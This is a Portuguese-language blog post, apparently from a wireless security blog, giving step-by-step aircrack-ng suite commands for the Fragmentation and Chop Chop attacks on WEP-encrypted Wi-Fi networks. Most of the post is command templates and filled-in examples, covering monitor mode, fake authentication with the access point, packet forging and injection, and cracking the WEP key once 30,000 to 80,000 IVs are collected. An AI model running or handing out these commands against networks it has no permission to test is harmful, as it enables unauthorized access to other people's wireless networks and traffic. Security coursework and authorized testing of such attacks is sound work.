Fragmentation Attack e Chop Chop Attack

Publicado: 22 de junho de 2011 em Wireless - Dark Side

Aproveitando uma dúvida postada pelo Anderson, resolvi transformar a resposta em um post.

Nesse post irei falar sobre dois famosos ataques à rede Wireless utilizando encriptação WEP, os comandos destes dois ataques são muito parecidos. O primeiro é o Fragmentation Attack: aireplay-ng, seguido da opção -5. A idéia básica do Fragmentation Attack é coletar fragmentos de pacotes e “montar” um ARP utilizando o arpforge-ng ou packetforge-ng. Em seguinda realizamos o packet injection para obter respostas e incrementar o número de IVs.

Para realizar o Fragmentation Attack, inicialmente precisamos colocar a placa Wireless no modo monitor:

airmon-ng start [device]

Exemplo: airmon-ng start wlan0

Para “ouvir” todas as redes Wireless próximas:

airodump-ng [device]

Exemplo: airodump-ng mon0

Em seguida, precisamos realizar o fake authentication com o Access Point:

aireplay-ng -1 0 -a [bssid] -e [essid] [device]

Exemplo: aireplay-ng -1 0 -a 00:11:22:33:44:55 -e WiFiWirelessCert mon0

Agora sim iniciamos o Fragmentation Attack:

aireplay-ng -5 -b [bssid] [device]

Exemplo: aireplay-ng -5 -b 00:11:22:33:44:55 mon0

O próximo passo é utilizar o PacketForge:

packetforge-ng -0 -a [bssid] -h [mac] -k 255.255.255.255 -l 255.255.255.255 -y [fragment-xxxx-xxxxxx.xor] -w [file]

Exemplo: packetforge-ng -0 -a 00:11:22:33:44:55 -h 66:77:88:99:11:22 -k 255.255.255.255 -l 255.255.255.255 -y fragment-1234-1234567.xor] -w arp-request

Precisamos agora utilizar o airodump para realizar o sniffer enquanto o packet injection é feito:

airodump-ng -c [channel] -w [file] -b [bssid] [device]

Exemplo: airodump-ng -c 6 -w WirelessCertCapture -b 00:11:22:33:44:55 mon0

Iniciar o packet injection:

aireplay-ng -2 -r [file] [device]

Exemplo: aireplay-ng -2 -r arp-request mon0

Por fim, Aircrack:

aircrack-ng -b [bssid] [file].cap

Exemplo: aircrack-ng -b 00:11:22:33:44:55 WirelessCertCapture.cap

Agora é só aguardar a contagem de IVs atingir de 30 a 80 mil e o aircrack conseguirá decifrar a chave de encriptação.

Este ataque é bastante parecido com o Chop Chop Attack. A sintaxe básica de comando para executar o Chop Chop Attack é:

airmon-ng start [device]

airodump-ng [device]

airodump-ng -c [channel] -w [file] -b [bssid] [device]

aireplay-ng -1 0 -a [bssid] -e [essid] [device]

aireplay-ng -4 -b [bssid] [device]

“Saving keystream in fragment-xxxx-xxxxxx.xor”

packetforge-ng -0 -a [bssid] -h [mac] -k 255.255.255.255 -l 255.255.255.255 -y [fragment-xxxx-xxxxxx.xor] -w [file02]

aireplay-ng -2 -r [file02] [device]

aircrack-ng -b [bssid] [file].cap

Abraços,

Bartulihe

Anúncios

Deixe um comentário

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair / Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair / Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair / Alterar )

Foto do Google+

Você está comentando utilizando sua conta Google+. Sair / Alterar )

Conectando a %s